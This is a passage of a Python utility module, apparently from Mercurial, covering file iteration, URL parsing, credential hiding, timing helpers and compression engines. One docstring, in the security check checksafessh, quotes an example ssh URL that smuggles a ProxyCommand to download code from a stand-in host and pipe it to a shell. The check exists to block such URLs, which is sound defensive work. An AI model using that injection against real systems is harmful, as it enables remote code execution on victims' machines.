2907 return iter(fp.readline, '')
2908 else:
2909 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2910 # note: this may block longer than necessary because of bufsize.
2911 def _safeiterfile(fp, bufsize=4096):
2912 fd = fp.fileno()
2913 line = ''
2914 while True:
2915 try:
2916 buf = os.read(fd, bufsize)
2917 except OSError as ex:
2918 # os.read only raises EINTR before any data is read
2919 if ex.errno == errno.EINTR:
2920 continue
2921 else:
2922 raise
2923 line += buf
2924 if '\n' in buf:
2925 splitted = line.splitlines(True)
2926 line = ''
2927 for l in splitted:
2928 if l[-1] == '\n':
2929 yield l
2930 else:
2931 line = l
2932 if not buf:
2933 break
2934 if line:
2935 yield line
2936
2937 def iterfile(fp):
2938 fastpath = True
2939 if type(fp) is file:
2940 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2941 if fastpath:
2942 return fp
2943 else:
2944 return _safeiterfile(fp)
2945 else:
2946 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2947 def iterfile(fp):
2948 return fp
2949
2950 def iterlines(iterator):
2951 for chunk in iterator:
2952 for line in chunk.splitlines():
2953 yield line
2954
2955 def expandpath(path):
2956 return os.path.expanduser(os.path.expandvars(path))
2957
2958 def hgcmd():
2959 """Return the command used to execute current hg
2960
2961 This is different from hgexecutable() because on Windows we want
2962 to avoid things opening new shell windows like batch files, so we
2963 get either the python call or current executable.
2964 """
2965 if mainfrozen():
2966 if getattr(sys, 'frozen', None) == 'macosx_app':
2967 # Env variable set by py2app
2968 return [encoding.environ['EXECUTABLEPATH']]
2969 else:
2970 return [pycompat.sysexecutable]
2971 return gethgcmd()
2972
2973 def rundetached(args, condfn):
2974 """Execute the argument list in a detached process.
2975
2976 condfn is a callable which is called repeatedly and should return
2977 True once the child process is known to have started successfully.
2978 At this point, the child process PID is returned. If the child
2979 process fails to start or finishes before condfn() evaluates to
2980 True, return -1.
2981 """
2982 # Windows case is easier because the child process is either
2983 # successfully starting and validating the condition or exiting
2984 # on failure. We just poll on its PID. On Unix, if the child
2985 # process fails to start, it will be left in a zombie state until
2986 # the parent wait on it, which we cannot do since we expect a long
2987 # running process on success. Instead we listen for SIGCHLD telling
2988 # us our child process terminated.
2989 terminated = set()
2990 def handler(signum, frame):
2991 terminated.add(os.wait())
2992 prevhandler = None
2993 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2994 if SIGCHLD is not None:
2995 prevhandler = signal.signal(SIGCHLD, handler)
2996 try:
2997 pid = spawndetached(args)
2998 while not condfn():
2999 if ((pid in terminated or not testpid(pid))
3000 and not condfn()):
3001 return -1
3002 time.sleep(0.1)
3003 return pid
3004 finally:
3005 if prevhandler is not None:
3006 signal.signal(signal.SIGCHLD, prevhandler)
3007
3008 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
3009 """Return the result of interpolating items in the mapping into string s.
3010
3011 prefix is a single character string, or a two character string with
3012 a backslash as the first character if the prefix needs to be escaped in
3013 a regular expression.
3014
3015 fn is an optional function that will be applied to the replacement text
3016 just before replacement.
3017
3018 escape_prefix is an optional flag that allows using doubled prefix for
3019 its escaping.
3020 """
3021 fn = fn or (lambda s: s)
3022 patterns = '|'.join(mapping.keys())
3023 if escape_prefix:
3024 patterns += '|' + prefix
3025 if len(prefix) > 1:
3026 prefix_char = prefix[1:]
3027 else:
3028 prefix_char = prefix
3029 mapping[prefix_char] = prefix_char
3030 r = remod.compile(br'%s(%s)' % (prefix, patterns))
3031 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
3032
3033 def getport(port):
3034 """Return the port for a given network service.
3035
3036 If port is an integer, it's returned as is. If it's a string, it's
3037 looked up using socket.getservbyname(). If there's no matching
3038 service, error.Abort is raised.
3039 """
3040 try:
3041 return int(port)
3042 except ValueError:
3043 pass
3044
3045 try:
3046 return socket.getservbyname(pycompat.sysstr(port))
3047 except socket.error:
3048 raise Abort(_("no port number associated with service '%s'") % port)
3049
3050 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
3051 '0': False, 'no': False, 'false': False, 'off': False,
3052 'never': False}
3053
3054 def parsebool(s):
3055 """Parse s into a boolean.
3056
3057 If s is not a valid boolean, returns None.
3058 """
3059 return _booleans.get(s.lower(), None)
3060
3061 _hextochr = dict((a + b, chr(int(a + b, 16)))
3062 for a in string.hexdigits for b in string.hexdigits)
3063
3064 class url(object):
3065 r"""Reliable URL parser.
3066
3067 This parses URLs and provides attributes for the following
3068 components:
3069
3070 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
3071
3072 Missing components are set to None. The only exception is
3073 fragment, which is set to '' if present but empty.
3074
3075 If parsefragment is False, fragment is included in query. If
3076 parsequery is False, query is included in path. If both are
3077 False, both fragment and query are included in path.
3078
3079 See http://www.ietf.org/rfc/rfc2396.txt for more information.
3080
3081 Note that for backward compatibility reasons, bundle URLs do not
3082 take host names. That means 'bundle://../' has a path of '../'.
3083
3084 Examples:
3085
3086 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
3087 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
3088 >>> url(b'ssh://[::1]:2200//home/joe/repo')
3089 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
3090 >>> url(b'file:///home/joe/repo')
3091 <url scheme: 'file', path: '/home/joe/repo'>
3092 >>> url(b'file:///c:/temp/foo/')
3093 <url scheme: 'file', path: 'c:/temp/foo/'>
3094 >>> url(b'bundle:foo')
3095 <url scheme: 'bundle', path: 'foo'>
3096 >>> url(b'bundle://../foo')
3097 <url scheme: 'bundle', path: '../foo'>
3098 >>> url(br'c:\foo\bar')
3099 <url path: 'c:\\foo\\bar'>
3100 >>> url(br'\\blah\blah\blah')
3101 <url path: '\\\\blah\\blah\\blah'>
3102 >>> url(br'\\blah\blah\blah#baz')
3103 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
3104 >>> url(br'file:///C:\users\me')
3105 <url scheme: 'file', path: 'C:\\users\\me'>
3106
3107 Authentication credentials:
3108
3109 >>> url(b'ssh://joe:xyz@x/repo')
3110 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3111 >>> url(b'ssh://joe@x/repo')
3112 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3113
3114 Query strings and fragments:
3115
3116 >>> url(b'http://host/a?b#c')
3117 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3118 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3119 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3120
3121 Empty path:
3122
3123 >>> url(b'')
3124 <url path: ''>
3125 >>> url(b'#a')
3126 <url path: '', fragment: 'a'>
3127 >>> url(b'http://host/')
3128 <url scheme: 'http', host: 'host', path: ''>
3129 >>> url(b'http://host/#a')
3130 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3131
3132 Only scheme:
3133
3134 >>> url(b'http:')
3135 <url scheme: 'http'>
3136 """
3137
3138 _safechars = "!~*'()+"
3139 _safepchars = "/!~*'()+:\\"
3140 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
3141
3142 def __init__(self, path, parsequery=True, parsefragment=True):
3143 # We slowly chomp away at path until we have only the path left
3144 self.scheme = self.user = self.passwd = self.host = None
3145 self.port = self.path = self.query = self.fragment = None
3146 self._localpath = True
3147 self._hostport = ''
3148 self._origpath = path
3149
3150 if parsefragment and '#' in path:
3151 path, self.fragment = path.split('#', 1)
3152
3153 # special case for Windows drive letters and UNC paths
3154 if hasdriveletter(path) or path.startswith('\\\\'):
3155 self.path = path
3156 return
3157
3158 # For compatibility reasons, we can't handle bundle paths as
3159 # normal URLS
3160 if path.startswith('bundle:'):
3161 self.scheme = 'bundle'
3162 path = path[7:]
3163 if path.startswith('//'):
3164 path = path[2:]
3165 self.path = path
3166 return
3167
3168 if self._matchscheme(path):
3169 parts = path.split(':', 1)
3170 if parts[0]:
3171 self.scheme, path = parts
3172 self._localpath = False
3173
3174 if not path:
3175 path = None
3176 if self._localpath:
3177 self.path = ''
3178 return
3179 else:
3180 if self._localpath:
3181 self.path = path
3182 return
3183
3184 if parsequery and '?' in path:
3185 path, self.query = path.split('?', 1)
3186 if not path:
3187 path = None
3188 if not self.query:
3189 self.query = None
3190
3191 # // is required to specify a host/authority
3192 if path and path.startswith('//'):
3193 parts = path[2:].split('/', 1)
3194 if len(parts) > 1:
3195 self.host, path = parts
3196 else:
3197 self.host = parts[0]
3198 path = None
3199 if not self.host:
3200 self.host = None
3201 # path of file:///d is /d
3202 # path of file:///d:/ is d:/, not /d:/
3203 if path and not hasdriveletter(path):
3204 path = '/' + path
3205
3206 if self.host and '@' in self.host:
3207 self.user, self.host = self.host.rsplit('@', 1)
3208 if ':' in self.user:
3209 self.user, self.passwd = self.user.split(':', 1)
3210 if not self.host:
3211 self.host = None
3212
3213 # Don't split on colons in IPv6 addresses without ports
3214 if (self.host and ':' in self.host and
3215 not (self.host.startswith('[') and self.host.endswith(']'))):
3216 self._hostport = self.host
3217 self.host, self.port = self.host.rsplit(':', 1)
3218 if not self.host:
3219 self.host = None
3220
3221 if (self.host and self.scheme == 'file' and
3222 self.host not in ('localhost', '127.0.0.1', '[::1]')):
3223 raise Abort(_('file:// URLs can only refer to localhost'))
3224
3225 self.path = path
3226
3227 # leave the query string escaped
3228 for a in ('user', 'passwd', 'host', 'port',
3229 'path', 'fragment'):
3230 v = getattr(self, a)
3231 if v is not None:
3232 setattr(self, a, urlreq.unquote(v))
3233
3234 @encoding.strmethod
3235 def __repr__(self):
3236 attrs = []
3237 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
3238 'query', 'fragment'):
3239 v = getattr(self, a)
3240 if v is not None:
3241 attrs.append('%s: %r' % (a, v))
3242 return '<url %s>' % ', '.join(attrs)
3243
3244 def __bytes__(self):
3245 r"""Join the URL's components back into a URL string.
3246
3247 Examples:
3248
3249 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3250 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3251 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3252 'http://user:pw@host:80/?foo=bar&baz=42'
3253 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3254 'http://user:pw@host:80/?foo=bar%3dbaz'
3255 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3256 'ssh://user:pw@[::1]:2200//home/joe#'
3257 >>> bytes(url(b'http://localhost:80//'))
3258 'http://localhost:80//'
3259 >>> bytes(url(b'http://localhost:80/'))
3260 'http://localhost:80/'
3261 >>> bytes(url(b'http://localhost:80'))
3262 'http://localhost:80/'
3263 >>> bytes(url(b'bundle:foo'))
3264 'bundle:foo'
3265 >>> bytes(url(b'bundle://../foo'))
3266 'bundle:../foo'
3267 >>> bytes(url(b'path'))
3268 'path'
3269 >>> bytes(url(b'file:///tmp/foo/bar'))
3270 'file:///tmp/foo/bar'
3271 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3272 'file:///c:/tmp/foo/bar'
3273 >>> print(url(br'bundle:foo\bar'))
3274 bundle:foo\bar
3275 >>> print(url(br'file:///D:\data\hg'))
3276 file:///D:\data\hg
3277 """
3278 if self._localpath:
3279 s = self.path
3280 if self.scheme == 'bundle':
3281 s = 'bundle:' + s
3282 if self.fragment:
3283 s += '#' + self.fragment
3284 return s
3285
3286 s = self.scheme + ':'
3287 if self.user or self.passwd or self.host:
3288 s += '//'
3289 elif self.scheme and (not self.path or self.path.startswith('/')
3290 or hasdriveletter(self.path)):
3291 s += '//'
3292 if hasdriveletter(self.path):
3293 s += '/'
3294 if self.user:
3295 s += urlreq.quote(self.user, safe=self._safechars)
3296 if self.passwd:
3297 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3298 if self.user or self.passwd:
3299 s += '@'
3300 if self.host:
3301 if not (self.host.startswith('[') and self.host.endswith(']')):
3302 s += urlreq.quote(self.host)
3303 else:
3304 s += self.host
3305 if self.port:
3306 s += ':' + urlreq.quote(self.port)
3307 if self.host:
3308 s += '/'
3309 if self.path:
3310 # TODO: similar to the query string, we should not unescape the
3311 # path when we store it, the path might contain '%2f' = '/',
3312 # which we should *not* escape.
3313 s += urlreq.quote(self.path, safe=self._safepchars)
3314 if self.query:
3315 # we store the query in escaped form.
3316 s += '?' + self.query
3317 if self.fragment is not None:
3318 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3319 return s
3320
3321 __str__ = encoding.strmethod(__bytes__)
3322
3323 def authinfo(self):
3324 user, passwd = self.user, self.passwd
3325 try:
3326 self.user, self.passwd = None, None
3327 s = bytes(self)
3328 finally:
3329 self.user, self.passwd = user, passwd
3330 if not self.user:
3331 return (s, None)
3332 # authinfo[1] is passed to urllib2 password manager, and its
3333 # URIs must not contain credentials. The host is passed in the
3334 # URIs list because Python < 2.4.3 uses only that to search for
3335 # a password.
3336 return (s, (None, (s, self.host),
3337 self.user, self.passwd or ''))
3338
3339 def isabs(self):
3340 if self.scheme and self.scheme != 'file':
3341 return True # remote URL
3342 if hasdriveletter(self.path):
3343 return True # absolute for our purposes - can't be joined()
3344 if self.path.startswith(br'\\'):
3345 return True # Windows UNC path
3346 if self.path.startswith('/'):
3347 return True # POSIX-style
3348 return False
3349
3350 def localpath(self):
3351 if self.scheme == 'file' or self.scheme == 'bundle':
3352 path = self.path or '/'
3353 # For Windows, we need to promote hosts containing drive
3354 # letters to paths with drive letters.
3355 if hasdriveletter(self._hostport):
3356 path = self._hostport + '/' + self.path
3357 elif (self.host is not None and self.path
3358 and not hasdriveletter(path)):
3359 path = '/' + path
3360 return path
3361 return self._origpath
3362
3363 def islocal(self):
3364 '''whether localpath will return something that posixfile can open'''
3365 return (not self.scheme or self.scheme == 'file'
3366 or self.scheme == 'bundle')
3367
3368 def hasscheme(path):
3369 return bool(url(path).scheme)
3370
3371 def hasdriveletter(path):
3372 return path and path[1:2] == ':' and path[0:1].isalpha()
3373
3374 def urllocalpath(path):
3375 return url(path, parsequery=False, parsefragment=False).localpath()
3376
3377 def checksafessh(path):
3378 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3379
3380 This is a sanity check for ssh urls. ssh will parse the first item as
3381 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3382 Let's prevent these potentially exploited urls entirely and warn the
3383 user.
3384
3385 Raises an error.Abort when the url is unsafe.
3386 """
3387 path = urlreq.unquote(path)
3388 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3389 raise error.Abort(_('potentially unsafe url: %r') %
3390 (path,))
3391
3392 def hidepassword(u):
3393 '''hide user credential in a url string'''
3394 u = url(u)
3395 if u.passwd:
3396 u.passwd = '***'
3397 return bytes(u)
3398
3399 def removeauth(u):
3400 '''remove all authentication information from a url string'''
3401 u = url(u)
3402 u.user = u.passwd = None
3403 return str(u)
3404
3405 timecount = unitcountfn(
3406 (1, 1e3, _('%.0f s')),
3407 (100, 1, _('%.1f s')),
3408 (10, 1, _('%.2f s')),
3409 (1, 1, _('%.3f s')),
3410 (100, 0.001, _('%.1f ms')),
3411 (10, 0.001, _('%.2f ms')),
3412 (1, 0.001, _('%.3f ms')),
3413 (100, 0.000001, _('%.1f us')),
3414 (10, 0.000001, _('%.2f us')),
3415 (1, 0.000001, _('%.3f us')),
3416 (100, 0.000000001, _('%.1f ns')),
3417 (10, 0.000000001, _('%.2f ns')),
3418 (1, 0.000000001, _('%.3f ns')),
3419 )
3420
3421 _timenesting = [0]
3422
3423 def timed(func):
3424 '''Report the execution time of a function call to stderr.
3425
3426 During development, use as a decorator when you need to measure
3427 the cost of a function, e.g. as follows:
3428
3429 @util.timed
3430 def foo(a, b, c):
3431 pass
3432 '''
3433
3434 def wrapper(*args, **kwargs):
3435 start = timer()
3436 indent = 2
3437 _timenesting[0] += indent
3438 try:
3439 return func(*args, **kwargs)
3440 finally:
3441 elapsed = timer() - start
3442 _timenesting[0] -= indent
3443 stderr.write('%s%s: %s\n' %
3444 (' ' * _timenesting[0], func.__name__,
3445 timecount(elapsed)))
3446 return wrapper
3447
3448 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3449 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3450
3451 def sizetoint(s):
3452 '''Convert a space specifier to a byte count.
3453
3454 >>> sizetoint(b'30')
3455 30
3456 >>> sizetoint(b'2.2kb')
3457 2252
3458 >>> sizetoint(b'6M')
3459 6291456
3460 '''
3461 t = s.strip().lower()
3462 try:
3463 for k, u in _sizeunits:
3464 if t.endswith(k):
3465 return int(float(t[:-len(k)]) * u)
3466 return int(t)
3467 except ValueError:
3468 raise error.ParseError(_("couldn't parse size: %s") % s)
3469
3470 class hooks(object):
3471 '''A collection of hook functions that can be used to extend a
3472 function's behavior. Hooks are called in lexicographic order,
3473 based on the names of their sources.'''
3474
3475 def __init__(self):
3476 self._hooks = []
3477
3478 def add(self, source, hook):
3479 self._hooks.append((source, hook))
3480
3481 def __call__(self, *args):
3482 self._hooks.sort(key=lambda x: x[0])
3483 results = []
3484 for source, hook in self._hooks:
3485 results.append(hook(*args))
3486 return results
3487
3488 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3489 '''Yields lines for a nicely formatted stacktrace.
3490 Skips the 'skip' last entries, then return the last 'depth' entries.
3491 Each file+linenumber is formatted according to fileline.
3492 Each line is formatted according to line.
3493 If line is None, it yields:
3494 length of longest filepath+line number,
3495 filepath+linenumber,
3496 function
3497
3498 Not be used in production code but very convenient while developing.
3499 '''
3500 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3501 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3502 ][-depth:]
3503 if entries:
3504 fnmax = max(len(entry[0]) for entry in entries)
3505 for fnln, func in entries:
3506 if line is None:
3507 yield (fnmax, fnln, func)
3508 else:
3509 yield line % (fnmax, fnln, func)
3510
3511 def debugstacktrace(msg='stacktrace', skip=0,
3512 f=stderr, otherf=stdout, depth=0):
3513 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3514 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3515 By default it will flush stdout first.
3516 It can be used everywhere and intentionally does not require an ui object.
3517 Not be used in production code but very convenient while developing.
3518 '''
3519 if otherf:
3520 otherf.flush()
3521 f.write('%s at:\n' % msg.rstrip())
3522 for line in getstackframes(skip + 1, depth=depth):
3523 f.write(line)
3524 f.flush()
3525
3526 class dirs(object):
3527 '''a multiset of directory names from a dirstate or manifest'''
3528
3529 def __init__(self, map, skip=None):
3530 self._dirs = {}
3531 addpath = self.addpath
3532 if safehasattr(map, 'iteritems') and skip is not None:
3533 for f, s in map.iteritems():
3534 if s[0] != skip:
3535 addpath(f)
3536 else:
3537 for f in map:
3538 addpath(f)
3539
3540 def addpath(self, path):
3541 dirs = self._dirs
3542 for base in finddirs(path):
3543 if base in dirs:
3544 dirs[base] += 1
3545 return
3546 dirs[base] = 1
3547
3548 def delpath(self, path):
3549 dirs = self._dirs
3550 for base in finddirs(path):
3551 if dirs[base] > 1:
3552 dirs[base] -= 1
3553 return
3554 del dirs[base]
3555
3556 def __iter__(self):
3557 return iter(self._dirs)
3558
3559 def __contains__(self, d):
3560 return d in self._dirs
3561
3562 if safehasattr(parsers, 'dirs'):
3563 dirs = parsers.dirs
3564
3565 def finddirs(path):
3566 pos = path.rfind('/')
3567 while pos != -1:
3568 yield path[:pos]
3569 pos = path.rfind('/', 0, pos)
3570
3571 # compression code
3572
3573 SERVERROLE = 'server'
3574 CLIENTROLE = 'client'
3575
3576 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3577 (u'name', u'serverpriority',
3578 u'clientpriority'))
3579
3580 class compressormanager(object):
3581 """Holds registrations of various compression engines.
3582
3583 This class essentially abstracts the differences between compression
3584 engines to allow new compression formats to be added easily, possibly from
3585 extensions.
3586
3587 Compressors are registered against the global instance by calling its
3588 ``register()`` method.
3589 """
3590 def __init__(self):
3591 self._engines = {}
3592 # Bundle spec human name to engine name.
3593 self._bundlenames = {}
3594 # Internal bundle identifier to engine name.
3595 self._bundletypes = {}
3596 # Revlog header to engine name.
3597 self._revlogheaders = {}
3598 # Wire proto identifier to engine name.
3599 self._wiretypes = {}
3600
3601 def __getitem__(self, key):
3602 return self._engines[key]
3603
3604 def __contains__(self, key):
3605 return key in self._engines
3606
3607 def __iter__(self):
3608 return iter(self._engines.keys())
3609
3610 def register(self, engine):
3611 """Register a compression engine with the manager.
3612
3613 The argument must be a ``compressionengine`` instance.
3614 """
3615 if not isinstance(engine, compressionengine):
3616 raise ValueError(_('argument must be a compressionengine'))
3617
3618 name = engine.name()
3619
3620 if name in self._engines:
3621 raise error.Abort(_('compression engine %s already registered') %
3622 name)
3623
3624 bundleinfo = engine.bundletype()
3625 if bundleinfo:
3626 bundlename, bundletype = bundleinfo
3627
3628 if bundlename in self._bundlenames:
3629 raise error.Abort(_('bundle name %s already registered') %
3630 bundlename)
3631 if bundletype in self._bundletypes:
3632 raise error.Abort(_('bundle type %s already registered by %s') %
3633 (bundletype, self._bundletypes[bundletype]))
3634
3635 # No external facing name declared.
3636 if bundlename:
3637 self._bundlenames[bundlename] = name
3638
3639 self._bundletypes[bundletype] = name
3640
3641 wiresupport = engine.wireprotosupport()
3642 if wiresupport:
3643 wiretype = wiresupport.name
3644 if wiretype in self._wiretypes:
3645 raise error.Abort(_('wire protocol compression %s already '
3646 'registered by %s') %
3647 (wiretype, self._wiretypes[wiretype]))
3648
3649 self._wiretypes[wiretype] = name
3650
3651 revlogheader = engine.revlogheader()
3652 if revlogheader and revlogheader in self._revlogheaders:
3653 raise error.Abort(_('revlog header %s already registered by %s') %
3654 (revlogheader, self._revlogheaders[revlogheader]))
3655
3656 if revlogheader:
3657 self._revlogheaders[revlogheader] = name
3658
3659 self._engines[name] = engine
3660
3661 @property
3662 def supportedbundlenames(self):
3663 return set(self._bundlenames.keys())
3664
3665 @property
3666 def supportedbundletypes(self):
3667 return set(self._bundletypes.keys())
3668
3669 def forbundlename(self, bundlename):
3670 """Obtain a compression engine registered to a bundle name.
3671
3672 Will raise KeyError if the bundle type isn't registered.
3673
3674 Will abort if the engine is known but not available.
3675 """
3676 engine = self._engines[self._bundlenames[bundlename]]
3677 if not engine.available():
3678 raise error.Abort(_('compression engine %s could not be loaded') %
3679 engine.name())
3680 return engine
3681
3682 def forbundletype(self, bundletype):
3683 """Obtain a compression engine registered to a bundle type.
3684
3685 Will raise KeyError if the bundle type isn't registered.
3686
3687 Will abort if the engine is known but not available.
3688 """
3689 engine = self._engines[self._bundletypes[bundletype]]
3690 if not engine.available():
3691 raise error.Abort(_('compression engine %s could not be loaded') %
3692 engine.name())
3693 return engine
3694
3695 def supportedwireengines(self, role, onlyavailable=True):
3696 """Obtain compression engines that support the wire protocol.
3697
3698 Returns a list of engines in prioritized order, most desired first.
3699
3700 If ``onlyavailable`` is set, filter out engines that can't be
3701 loaded.
3702 """
3703 assert role in (SERVERROLE, CLIENTROLE)
3704
3705 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3706
3707 engines = [self._engines[e] for e in self._wiretypes.values()]
3708 if onlyavailable:
3709 engines = [e for e in engines if e.available()]
3710
3711 def getkey(e):
3712 # Sort first by priority, highest first. In case of tie, sort
3713 # alphabetically. This is arbitrary, but ensures output is
3714 # stable.
3715 w = e.wireprotosupport()
3716 return -1 * getattr(w, attr), w.name
3717
3718 return list(sorted(engines, key=getkey))
3719
3720 def forwiretype(self, wiretype):
3721 engine = self._engines[self._wiretypes[wiretype]]
3722 if not engine.available():
3723 raise error.Abort(_('compression engine %s could not be loaded') %
3724 engine.name())
3725 return engine
3726
3727 def forrevlogheader(self, header):
3728 """Obtain a compression engine registered to a revlog header.
3729
3730 Will raise KeyError if the revlog header value isn't registered.
3731 """
3732 return self._engines[self._revlogheaders[header]]
3733
3734 compengines = compressormanager()
3735
3736 class compressionengine(object):
3737 """Base class for compression engines.
3738
3739 Compression engines must implement the interface defined by this class.
3740 """
3741 def name(self):
3742 """Returns the name of the compression engine.
3743
3744 This is the key the engine is registered under.
3745
3746 This method must be implemented.
3747 """
3748 raise NotImplementedError()
3749
3750 def available(self):
3751 """Whether the compression engine is available.
3752
3753 The intent of this method is to allow optional compression engines
3754 that may not be available in all installations (such as engines relying
3755 on C extensions that may not be present).
3756 """
3757 return True
3758
3759 def bundletype(self):
3760 """Describes bundle identifiers for this engine.
3761
3762 If this compression engine isn't supported for bundles, returns None.
3763
3764 If this engine can be used for bundles, returns a 2-tuple of strings of
3765 the user-facing "bundle spec" compression name and an internal
3766 identifier used to denote the compression format within bundles. To
3767 exclude the name from external usage, set the first element to ``None``.
3768
3769 If bundle compression is supported, the class must also implement
3770 ``compressstream`` and `decompressorreader``.
3771
3772 The docstring of this method is used in the help system to tell users
3773 about this engine.
3774 """
3775 return None
3776
3777 def wireprotosupport(self):
3778 """Declare support for this compression format on the wire protocol.
3779
3780 If this compression engine isn't supported for compressing wire
3781 protocol payloads, returns None.
3782
3783 Otherwise, returns ``compenginewireprotosupport`` with the following
3784 fields:
3785
3786 * String format identifier
3787 * Integer priority for the server
3788 * Integer priority for the client
3789
3790 The integer priorities are used to order the advertisement of format
3791 support by server and client. The highest integer is advertised
3792 first. Integers with non-positive values aren't advertised.
3793
3794 The priority values are somewhat arbitrary and only used for default
3795 ordering. The relative order can be changed via config options.
3796
3797 If wire protocol compression is supported, the class must also implement
3798 ``compressstream`` and ``decompressorreader``.
3799 """
3800 return None
3801
3802 def revlogheader(self):
3803 """Header added to revlog chunks that identifies this engine.
3804
3805 If this engine can be used to compress revlogs, this method should
3806 return the bytes used to identify chunks compressed with this engine.
3807 Else, the method should return ``None`` to indicate it does not
3808 participate in revlog compression.
3809 """
3810 return None
3811
3812 def compressstream(self, it, opts=None):
3813 """Compress an iterator of chunks.
3814
3815 The method receives an iterator (ideally a generator) of chunks of
3816 bytes to be compressed. It returns an iterator (ideally a generator)
3817 of bytes of chunks representing the compressed output.
3818
3819 Optionally accepts an argument defining how to perform compression.
3820 Each engine treats this argument differently.
3821 """
3822 raise NotImplementedError()
3823
3824 def decompressorreader(self, fh):
3825 """Perform decompression on a file object.
3826
3827 Argument is an object with a ``read(size)`` method that returns
3828 compressed data. Return value is an object with a ``read(size)`` that
3829 returns uncompressed data.
3830 """
3831 raise NotImplementedError()
3832
3833 def revlogcompressor(self, opts=None):
3834 """Obtain an object that can be used to compress revlog entries.
3835
3836 The object has a ``compress(data)`` method that compresses binary
3837 data. This method returns compressed binary data or ``None`` if
3838 the data could not be compressed (too small, not compressible, etc).
3839 The returned data should have a header uniquely identifying this
3840 compression format so decompression can be routed to this engine.
3841 This header should be identified by the ``revlogheader()`` return
3842 value.
3843
3844 The object has a ``decompress(data)`` method that decompresses
3845 data. The method will only be called if ``data`` begins with
3846 ``revlogheader()``. The method should return the raw, uncompressed
3847 data or raise a ``RevlogError``.
3848
3849 The object is reusable but is not thread safe.
3850 """
3851 raise NotImplementedError()
3852
3853 class _zlibengine(compressionengine):
3854 def name(self):
3855 return 'zlib'
3856
3857 def bundletype(self):
3858 """zlib compression using the DEFLATE algorithm.
3859
3860 All Mercurial clients should support this format. The compression
3861 algorithm strikes a reasonable balance between compression ratio
3862 and size.
3863 """
3864 return 'gzip', 'GZ'
3865
3866 def wireprotosupport(self):
3867 return compewireprotosupport('zlib', 20, 20)
3868
3869 def revlogheader(self):
3870 return 'x'
3871
3872 def compressstream(self, it, opts=None):
3873 opts = opts or {}
3874
3875 z = zlib.compressobj(opts.get('level', -1))
3876 for chunk in it:
3877 data = z.compress(chunk)
3878 # Not all calls to compress emit data. It is cheaper to inspect
3879 # here than to feed empty chunks through generator.
3880 if data:
3881 yield data
3882
3883 yield z.flush()
3884
3885 def decompressorreader(self, fh):
3886 def gen():
3887 d = zlib.decompressobj()
3888 for chunk in filechunkiter(fh):
3889 while chunk:
3890 # Limit output size to limit memory.
3891 yield d.decompress(chunk, 2 ** 18)
3892 chunk = d.unconsumed_tail
3893
3894 return chunkbuffer(gen())
3895
3896 class zlibrevlogcompressor(object):
3897 def compress(self, data):
3898 insize = len(data)
3899 # Caller handles empty input case.
3900 assert insize > 0
3901
3902 if insize < 44:
3903 return None
3904
3905 elif insize <= 1000000:
3906 compressed = zlib.compress(data)
3907 if len(compressed) < insize:
3908 return compressed
3909 return None
3910
3911 # zlib makes an internal copy of the input buffer, doubling
3912 # memory usage for large inputs. So do streaming compression
3913 # on large inputs.
3914 else:
3915 z = zlib.compressobj()
3916 parts = []
3917 pos = 0
3918 while pos < insize:
3919 pos2 = pos + 2**20
3920 parts.append(z.compress(data[pos:pos2]))
3921 pos = pos2
3922 parts.append(z.flush())
3923
3924 if sum(map(len, parts)) < insize:
3925 return ''.join(parts)
3926 return None
3927
3928 def decompress(self, data):
3929 try:
3930 return zlib.decompress(data)
3931 except zlib.error as e:
3932 raise error.RevlogError(_('revlog decompress error: %s') %
3933 forcebytestr(e))
3934
3935 def revlogcompressor(self, opts=None):
3936 return self.zlibrevlogcompressor()
3937
3938 compengines.register(_zlibengine())
3939
3940 class _bz2engine(compressionengine):
3941 def name(self):
3942 return 'bz2'
3943
3944 def bundletype(self):
3945 """An algorithm that produces smaller bundles than ``gzip``.
3946
3947 All Mercurial clients should support this format.
3948
3949 This engine will likely produce smaller bundles than ``gzip`` but
3950 will be significantly slower, both during compression and
3951 decompression.
3952
3953 If available, the ``zstd`` engine can yield similar or better
3954 compression at much higher speeds.
3955 """
3956 return 'bzip2', 'BZ'
